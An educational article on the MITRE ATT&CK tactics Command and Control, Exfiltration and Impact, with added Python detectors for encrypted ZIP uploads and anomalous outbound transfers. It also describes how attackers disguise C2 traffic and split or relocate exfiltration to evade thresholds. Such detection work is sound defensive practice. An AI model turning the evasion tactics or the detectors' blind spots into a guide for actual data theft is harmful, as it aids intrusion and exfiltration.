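An added example (not from the original article) of the one thing a DLP can still do with an opaque archive: read the header flag that marks encrypted ZIP entries, and fall back to size plus byte entropy for anything that is not a recognizable archive. The sample files are constructed in memory; the "encrypted" ZIP is a plain ZIP with the encryption flag bit set in its headers, which is all this check looks at.

```python
import hashlib
import io
import math
import zipfile
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: English text sits around 4-5, compressed or encrypted data near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def zip_encrypted_entries(data: bytes):
    """Bit 0 of each entry's general-purpose flag is set when the entry is encrypted
    (PKWARE APPNOTE), for legacy ZipCrypto and WinZip AES alike. None if not a ZIP."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [info.filename for info in zf.infolist() if info.flag_bits & 0x1]
    except zipfile.BadZipFile:
        return None

def classify_outbound(name: str, data: bytes, min_size=2048, entropy_threshold=7.5):
    """Reasons to hold a file at the egress point. Encrypted ZIPs are identifiable from
    their headers even though the content is opaque; other blobs are judged on size+entropy."""
    reasons = []
    encrypted = zip_encrypted_entries(data)
    if encrypted:
        reasons.append(f"{name}: ZIP with encrypted entries {encrypted}")
    elif encrypted is None and len(data) >= min_size and shannon_entropy(data) >= entropy_threshold:
        reasons.append(f"{name}: {len(data)} bytes of high-entropy data (possible encrypted archive)")
    return reasons

# Constructed samples. The "encrypted" ZIP is a plain ZIP with the encryption flag
# bit set in both the local header and the central directory.
def make_plain_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("clients.csv", "id,name,card_last4\n1,Karen Smith,4242\n")
    return buf.getvalue()

def set_encryption_flag(zip_bytes: bytes) -> bytes:
    data = bytearray(zip_bytes)
    for sig, offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):  # flags field offset per record
        pos = data.find(sig)
        while pos != -1:
            data[pos + offset] |= 0x01
            pos = data.find(sig, pos + 4)
    return bytes(data)

PLAIN_ZIP = make_plain_zip()
ENCRYPTED_ZIP = set_encryption_flag(PLAIN_ZIP)
MEMO_TXT = ("Quarterly board meeting notes. " * 100).encode()
# 8192 bytes of deterministic pseudo-random data standing in for an encrypted RAR.
OPAQUE_BLOB = b"".join(hashlib.sha256(bytes([i, j])).digest() for i in range(16) for j in range(16))

if __name__ == "__main__":
    for name, data in [("clients.zip", PLAIN_ZIP), ("clients.zip", ENCRYPTED_ZIP),
                       ("memo.txt", MEMO_TXT), ("backup.bin", OPAQUE_BLOB)]:
        print(classify_outbound(name, data) or f"{name}: ok")
```

The flag check costs nothing and does not need the password; the entropy check catches containers the parser does not understand, at the price of also flagging legitimate compressed or encrypted traffic, which is why the text's "if encrypted files are rare in your environment" matters.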
Command and Control is the twelfth of 14 tactics on the MITRE ATT&CK Framework. As with the previous tactics we have covered, this does not mean it is the twelfth step in the process. What this means is that it is a later step in the process. This is the “ET Phone Home” step in the process. Depending on how the network breach occurred, this can actually be much earlier in the process than twelfth.
Warning, I am going to say something that sounds obvious. Sometimes a hack is caused by a hacker. What do I mean by that? Well, what I mean is that sometimes there is someone behind the keyboard on one computer trying to actively hack into your computer. However, this is not always the case. Sometimes the process is completely automated. When a phishing attack goes out, it will go out to hundreds or thousands of people at a time. This is especially true if it is a spearphishing attack aimed at your company. If just one person clicks on the link and eventually downloads malware, that malware has to be able to tell the hacker that it successfully installed itself. This is an "if a tree falls in the woods" type of scenario. If you download and install malware on your computer but the hacker never finds out, did it really happen? With the enormity of the Internet, that malware has to phone home to tell the hacker it is alive and waiting for them to connect to it. Well, we have reached a level of sophistication at this point that the malware doesn't just send an email to one hacker; it actually logs into a complex command and control infrastructure to be registered and await further instruction. One of the tricks is to obscure that command and control traffic so it is not obvious to the defenders what it is. Often the command and control traffic will disguise itself as regular web traffic, since most web requests originating from inside the network are automatically deemed allowable traffic. The giveaway is usually timing rather than content: people browse in bursts, while an implant checks in on a schedule.
Another thing a command and control infrastructure can do is deliver additional payloads. The small piece of malware that initially got installed on your computer can now download larger, more complex pieces of malware which do additional things. One example is downloading an entire mail-sending program, complete with huge address books, and turning your computer into a spam bot. Now your computer is acting on behalf of the hacker, sending out more phishing emails that perpetuate the cycle. Whatever happens after the command and control system is contacted, it is one more step toward losing your data, your intellectual property, and even your money.
Exfiltration is the thirteenth of 14 tactics in the MITRE ATT&CK framework. While not always the thirteenth event to happen during a hack, it is one of the last things that happens during a breach. Even a ransomware attacker will steal files before encrypting them: if you will not pay to decrypt your files, you may pay to keep them from being released on the internet.
Exfiltration is the actual moving of your data off of your network. That movement can be directly to the hacker’s machine or to some intermediate repository. The intermediate location may be someone else’s hacked machine, but it is often a cloud machine the hackers control in the same country as you, so that your systems do not raise a flag about suddenly sending gigabytes of data overseas. The biggest hurdle the hackers have to overcome is that many networks are set up to detect large data transfers. So the trick is to disguise these transfers as something else, or to break them into many small pieces that each stay under the thresholds. Some hackers have even hidden exfiltration in DNS traffic, which is discussed here (https://www.infoblox.com/wp-content/uploads/infoblox-whitepaper-data-exfiltration-and-dns-closing-the-back-door.pdf).
If we look back to Collection, there are likely large encrypted RAR or ZIP files sitting somewhere on your network, and these are the files being transported off of it. If we are at this stage of the breach, this is the last chance you have to protect your data before it is gone for good. We touched on GEOIP earlier in the series under Initial Access. If you recall, GEOIP is a service which tells you where in the world an IP address is located. Each computer, or group of computers, is assigned an IP address in order to communicate on the internet. While not a perfect system, blocks or ranges of those addresses are allocated to organizations that register them in different parts of the world. This is usually good enough to say whether or not an IP address is located in the same country as your business. The question you have to ask is whether your users should be uploading gigabytes of data to a foreign IP address at 3am local time. If that is not normal behavior, it may be a clue that something is going on. However, 3am traffic from a remote workforce may not be that strange in today’s environment. What to look for is the direction of the traffic (uploading versus downloading), the volume compared with what that host usually sends, and the location of the computer receiving the data. Once we know what normal looks like, only then can we declare something abnormal.
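The "know what normal looks like" check above, as an added example (not code from the original article) run over flow records: each host's median daily upload is the baseline, and a flow is only worth an alert when it is upload-dominant, several times the baseline, and either foreign-bound or off-hours. The flow records, the GeoIP table (documentation address ranges with made-up countries standing in for a real lookup), the business hours and the multipliers are all constructed assumptions.

```python
"""Flag uploads that break a host's normal pattern: direction (out > in),
volume against that host's own baseline, destination country, and time of
day. Added example, not part of the original article. The flow records and
the GeoIP table are constructed; the thresholds and business hours are
assumptions to tune for your environment."""
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

HOME_COUNTRY = "US"
BUSINESS_HOURS = range(7, 20)         # assumed: 07:00-19:59 local
BASELINE_FACTOR = 5                   # assumed: "big" = 5x the host's median daily upload
ABSOLUTE_FLOOR = 100 * 1024 * 1024    # assumed: hosts with no history get a 100 MiB floor

# Constructed stand-in for a GeoIP database (documentation ranges, made-up countries).
GEOIP = [
    (ipaddress.ip_network("203.0.113.0/24"), "US"),
    (ipaddress.ip_network("192.0.2.0/24"), "US"),
    (ipaddress.ip_network("198.51.100.0/24"), "DE"),
]

# Constructed flow records: timestamp src dst bytes_out bytes_in
HISTORY = [
    "2024-03-04T10:15:00 10.0.0.23 203.0.113.10 2000000 50000000",
    "2024-03-04T14:40:00 10.0.0.23 203.0.113.11 2000000 50000000",
    "2024-03-05T09:05:00 10.0.0.23 203.0.113.10 2000000 50000000",
    "2024-03-05T16:20:00 10.0.0.23 203.0.113.12 2000000 50000000",
    "2024-03-06T11:30:00 10.0.0.23 203.0.113.10 2000000 50000000",
    "2024-03-06T15:10:00 10.0.0.23 203.0.113.11 2000000 50000000",
    "2024-03-04T22:00:00 10.0.0.41 203.0.113.9 300000 400000000",
    "2024-03-05T23:30:00 10.0.0.41 203.0.113.9 300000 400000000",
    "2024-03-06T01:00:00 10.0.0.41 203.0.113.9 300000 400000000",
]
TODAY = [
    "2024-03-07T03:12:00 10.0.0.23 198.51.100.7 6000000000 120000",  # the black bags leaving
    "2024-03-07T11:00:00 10.0.0.23 203.0.113.5 30000000 200000",     # big, but home country, business hours
    "2024-03-07T03:00:00 10.0.0.41 203.0.113.9 200000 400000000",    # remote worker downloading at 3am
]


def geoip(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for net, country in GEOIP:
        if addr in net:
            return country
    return "??"


def parse_flows(lines):
    flows = []
    for line in lines:
        ts, src, dst, out_b, in_b = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(out_b), int(in_b)))
    return flows


def daily_upload_baseline(history):
    """Median of each host's total outbound bytes per day: what 'normal' looks like."""
    per_day = defaultdict(lambda: defaultdict(int))
    for ts, src, _, out_b, _ in parse_flows(history):
        per_day[src][ts.date()] += out_b
    return {src: statistics.median(days.values()) for src, days in per_day.items()}


def suspicious_uploads(history, today):
    baseline = daily_upload_baseline(history)
    alerts = []
    for ts, src, dst, out_b, in_b in parse_flows(today):
        if out_b <= in_b:
            continue                        # download-dominant: not exfiltration
        normal = baseline.get(src)
        big = out_b >= (BASELINE_FACTOR * normal if normal else ABSOLUTE_FLOOR)
        if not big:
            continue
        reasons = []
        country = geoip(dst)
        if country != HOME_COUNTRY:
            reasons.append(f"foreign destination ({country})")
        if ts.hour not in BUSINESS_HOURS:
            reasons.append(f"off-hours ({ts:%H:%M})")
        if reasons:                         # size alone is noise; size plus context is a lead
            alerts.append((src, dst, out_b, reasons))
    return alerts


if __name__ == "__main__":
    for src, dst, out_b, reasons in suspicious_uploads(HISTORY, TODAY):
        print(f"{src} -> {dst}: {out_b / 1e9:.1f} GB out; {'; '.join(reasons)}")
```

The 3am download by the remote worker and the large daytime upload to a domestic address both pass quietly, which is the behaviour the paragraph asks for: the alert fires on the combination of direction, volume, destination and time, not on any one of them.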
Impact is the last of the 14 tactics in the MITRE ATT&CK Framework. This tactic could also be named “destructive techniques,” as that is exactly what most of them are. The technique most people are aware of is ransomware, where the hackers encrypt your files and ask you to pay a ransom to potentially receive the decryption key.
Ransomware is popular because it is a way hackers can gather money, since most people have a willingness to pay. Originally, hackers went after personal computers and asked for $200 to $500 per computer. Now hackers target corporations and ask for millions of dollars. Almost nothing appears to be off limits, as can be seen from multiple hospitals being targeted with ransomware and the ransom still being demanded (https://www.wsj.com/articles/the-ruthless-cyber-gang-behind-the-hospital-ransomware-crisis-11623340215). However, things were thought to have changed during the Colonial Pipeline hack, which shut down the gasoline pipeline serving most of the East Coast of the United States (https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/). When the hackers responsible for the breach closed down their online presence and the pipeline company was reportedly in possession of the decryption tool, some thought the hackers had given in to online pressure that the attack was too sensitive and that they should not have hit critical infrastructure. Others thought it might still be a hoax (https://www.washingtonpost.com/technology/2021/05/14/darkside-ransomware-shutting-down/). However, it was later reported that Colonial paid close to $5M in ransom to get the decryption tool, and the hackers who shut down their website were simply happy with their money (https://www.zdnet.com/article/colonial-pipeline-paid-close-to-5-million-in-ransomware-blackmail-payment/). The ironic thing was that while the decryption tool did work, it was so slow that it was faster to recover from the company’s offline backups. At the end of the day, your data will be stolen, encrypted, or destroyed as the result of a cyber breach. The question becomes whether or not your reputation can handle the consequences of poor cyber hygiene.